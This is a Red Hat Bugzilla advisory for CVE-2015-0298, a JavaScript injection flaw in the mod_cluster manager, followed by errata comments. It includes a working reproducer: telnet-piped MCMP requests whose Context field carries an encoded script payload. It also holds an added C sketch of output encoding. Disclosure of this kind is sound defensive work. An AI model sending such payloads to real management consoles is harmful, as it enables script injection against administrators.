Bug 1197769 (CVE-2015-0298) - CVE-2015-0298 mod_cluster: JavaScript code injection is possible via MCMP mod_manager messages
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2015-0298
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact: Michal Karm Babacek
URL:
Whiteboard:
Depends On: 1197186 1238180 1245614 1260483 1260484
Blocks: 1197776 1254231
Reported: 2015-03-02 15:01 UTC by Vasyl Kaigorodov
Modified: 2019-09-29 13:29 UTC (History)

Fixed In Version:
Clone Of:
Environment:
Last Closed: 2019-06-08 02:39:19 UTC
Embargoed:




Links
System ID Private Priority Status Summary Last Updated
Red Hat Bugzilla 1326179 0 unspecified CLOSED (6.4.z) It is possible to inject JavaScript into mod_cluster manager console via MCMP messages 2021-02-22 00:41:40 UTC
Red Hat Product Errata RHSA-2015:1641 0 normal SHIPPED_LIVE Important: Red Hat JBoss Web Server 2.1.0 security update 2015-08-18 22:48:48 UTC
Red Hat Product Errata RHSA-2015:1642 0 normal SHIPPED_LIVE Important: Red Hat JBoss Web Server 2.1.0 security update 2015-08-18 22:51:12 UTC

Internal Links: 1326179

Description Vasyl Kaigorodov 2015-03-02 15:01:44 UTC
Michal Babacek from Red Hat discovered [1] that it's possible to inject arbitrary JavaScript code in the mod_manager web interface using MCMP messages:

- With mod_cluster Manager running on 127.0.0.1:6666 run the commands below:
"""
  { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
  { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
"""
- Open http://localhost:6666/mod_cluster_manager and you'll see a JavaScript pop-up Alert being executed.

Proposed (intrusive) patch and further discussion is available at [1].

[1]: https://issues.jboss.org/browse/MODCLUSTER-453
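
Added example (not part of the original report and not the mod_cluster patch): a minimal C sketch of output encoding for a value such as Context before it is written into a status page, which is the class of fix this kind of injection calls for. The function name escape_mcmp_value and the assumption that the value is still percent-encoded when it reaches the renderer are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode an MCMP field value and HTML-escape it in one pass.
 * Returns 0 on success; -1 if dst is too small or the value decodes to a
 * NUL byte (dst must not be used when -1 is returned). */
int escape_mcmp_value(const char *src, char *dst, size_t dstlen)
{
    size_t used = 0;
    while (*src) {
        char c = *src++;
        if (c == '%' && isxdigit((unsigned char)src[0]) && isxdigit((unsigned char)src[1])) {
            char hex[3] = { src[0], src[1], '\0' };
            c = (char)strtol(hex, NULL, 16);
            src += 2;
        }
        const char *rep = NULL;
        switch (c) {
        case '\0': return -1;               /* %00 would truncate the value */
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (used + n >= dstlen) return -1;  /* keep room for the terminator */
        memcpy(dst + used, rep ? rep : &c, n);
        used += n;
    }
    if (used >= dstlen) return -1;
    dst[used] = '\0';
    return 0;
}

int main(void)
{
    /* Context value from the reproducer above, as sent on the wire. */
    const char *ctx = "%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E";
    char safe[256];
    if (escape_mcmp_value(ctx, safe, sizeof safe) == 0)
        printf("Context: %s\n", safe);
    return 0;
}
```

With the value encoded this way, the browser displays the markup as text instead of parsing it as a script element.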

Comment 2 Timothy Walsh 2015-05-05 01:49:27 UTC
Removing embargo because the patch has been included in EAP 6.4.

Comment 8 errata-xmlrpc 2015-08-18 18:49:08 UTC
This issue has been addressed in the following products:

  JBoss Web Server 2.1.0

Via RHSA-2015:1641 https://rhn.redhat.com/errata/RHSA-2015-1641.html

Comment 10 errata-xmlrpc 2015-08-18 18:51:25 UTC
This issue has been addressed in the following products:

  JBEWS 2 for RHEL 6
  JBEWS 2 for RHEL 7
  JBEWS 2 for RHEL 5

Via RHSA-2015:1642 https://rhn.redhat.com/errata/RHSA-2015-1642.html

